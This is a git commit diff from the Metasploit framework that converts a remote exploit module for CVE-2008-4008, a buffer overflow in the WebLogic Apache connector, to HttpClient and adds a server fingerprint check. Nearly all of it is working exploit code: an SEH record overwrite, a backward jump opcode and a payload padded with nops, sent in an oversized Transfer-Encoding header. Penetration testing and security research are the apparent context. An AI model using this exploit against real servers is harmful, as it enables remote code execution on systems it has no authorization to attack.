convert module to HttpClient, check fingerprint -- untested

git-svn-id: file:///home/svn/framework3/trunk@9704 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-07-07 01:43:12 +00:00
parent dfce4901fe
commit 163d273dff
1 changed files with 20 additions and 17 deletions

View File

@ -14,7 +14,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::Seh
def initialize(info = {})
@ -33,7 +33,6 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'CVE', '2008-4008' ],
[ 'OSVDB', '49283' ],
[ 'URL', 'http://support.bea.com/application_content/product_portlets/securityadvisories/2806.html'],
],
'DefaultOptions' =>
{
@ -57,30 +56,34 @@ class Metasploit3 < Msf::Exploit::Remote
],
'DisclosureDate' => 'Sept 09 2008',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self.class )
end
def exploit
if not (http_fingerprint =~ /Apache/)
raise RuntimeError, "The target server doesn't appear to be running Apache."
end
sploit = Rex::Text.rand_text_alphanumeric(5800, payload_badchars)
sploit[5781, 8] = "\xeb\x06MC" + [target.ret].pack('V')
sploit = rand_text_alphanumeric(5800)
sploit[5781, 8] = generate_seh_record(target.ret)
# Jump backward to the payload
sploit[5789, 5] = "\xe9\x5e\xe9\xff\xff"
sploit[0, payload.encoded.length+7] = make_nops(7) + payload.encoded
request =
"POST /index.jsp HTTP/1.1\r\nHost: localhost\r\nTransfer-Encoding: " +
sploit +
"\r\n\r\n"
datastore['VHOST'] = 'localhost'
send_request_cgi(
{
'method' => 'POST',
'url' => '/index.jsp',
'data' => '',
'headers' =>
{
'Transfer-Encoding' => sploit
}
})
handler
connect
sock.put(request);
disconnect
end
end